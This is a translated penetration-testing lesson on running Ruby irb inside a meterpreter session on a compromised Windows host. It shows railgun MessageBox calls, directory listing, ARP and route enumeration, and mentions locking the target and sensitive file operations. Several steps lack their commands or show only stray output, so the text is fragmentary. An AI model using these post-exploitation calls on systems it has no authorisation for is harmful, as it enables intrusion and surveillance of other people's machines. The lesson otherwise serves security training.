Running irb inside a meterpreter session drops you into an interactive Ruby shell.

    Basic information gathering:

    Lock or log off the target machine:

    => {"GetLastError"=>0, "ErrorMessage"=>"\xB2\xD9\xD7\xF7\xB3\xC9\xB9\xA6\xCD\xEA\xB3\xC9\xA1\xA3", "return"=>true}
    >>

    Lesson 67: irb operations under meterpreter, part 1 - Figure 1

    Calling MessageBox:

    >> client.railgun.user32.MessageBoxA(0, "Micropoor", "Micropoor", "MB_OK")

    Quickly get the current absolute path:

    Directory operations:

    >> client.fs.dir.chdir("c:\\")
    => 0
    >> client.fs.dir.entries
    => ["ADFS", "AUTOEXEC.BAT", "boot.ini", "bootfont.bin", "CONFIG.SYS", "Documents and Settings", "Inetpub", "IO.SYS", "MSDOS.SYS", "NTDETECT.COM", "ntldr", "pagefile.sys", "Program Files", "Program Files (x86)", "RECYCLER", "System Volume Information", "WINDOWS", "wmpub"]

    Create a folder:

    => 0

    Hash operations:

    Lesson 67: irb operations under meterpreter, part 1 - Figure 2

    >> client.net.config.arp_table
    => [#<Rex::Post::Meterpreter::Extensions::Stdapi::Net::Arp:0x000055aee7f5f6b8 @ip_addr="192.168.1.1", @mac_addr="78:44:fd:8e:91:59", @interface="65539">,
        #<Rex::Post::Meterpreter::Extensions::Stdapi::Net::Arp:0x000055aee7f5ee20 @ip_addr="192.168.1.3", @mac_addr="28:16:ad:3b:51:78", @interface="65539">]
    >> client.net.config.arp_table[0].ip_addr
    => "192.168.1.1"
    >> client.net.config.arp_table[0].mac_addr
    => "78:44:fd:8e:91:59"
    => "65539"
    >> client.net.config.routes
    => [#<Rex::Post::Meterpreter::Extensions::Stdapi::Net::Route:0x000055aee789be58 @subnet="0.0.0.0", @netmask="0.0.0.0", @gateway="192.168.1.1", @interface="65539", @metric=10>,
        #<Rex::Post::Meterpreter::Extensions::Stdapi::Net::Route:0x000055aee789a7b0 @subnet="127.0.0.0", @netmask="255.0.0.0", @gateway="127.0.0.1", @interface="1", @metric=1>,
        #<Rex::Post::Meterpreter::Extensions::Stdapi::Net::Route:0x000055aee78993b0 @subnet="192.168.1.0", @netmask="255.255.255.0", @gateway="192.168.1.119", @interface="65539", @metric=10>,
        #<Rex::Post::Meterpreter::Extensions::Stdapi::Net::Route:0x000055aee786fec0 @subnet="192.168.1.119", @netmask="255.255.255.255", @gateway="127.0.0.1", @interface="1", @metric=10>,
        #<Rex::Post::Meterpreter::Extensions::Stdapi::Net::Route:0x000055aee786e9d0 @subnet="192.168.1.255", @netmask="255.255.255.255", @gateway="192.168.1.119", @interface="65539", @metric=10>,
        #<Rex::Post::Meterpreter::Extensions::Stdapi::Net::Route:0x000055aee786d698 @subnet="224.0.0.0", @netmask="240.0.0.0", @gateway="192.168.1.119", @interface="65539", @metric=10>,
        #<Rex::Post::Meterpreter::Extensions::Stdapi::Net::Route:0x000055aee785be98 @subnet="255.255.255.255", @netmask="255.255.255.255", @gateway="192.168.1.119", @interface="65539", @metric=1>]

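    Sensitive file operations in real engagements; this is currently the most stable and fastest method:

      More sensitive file operations will be added later.

      Lesson 67: irb operations under meterpreter, part 1 - Figure 3

      More related API operations will be covered in future lessons.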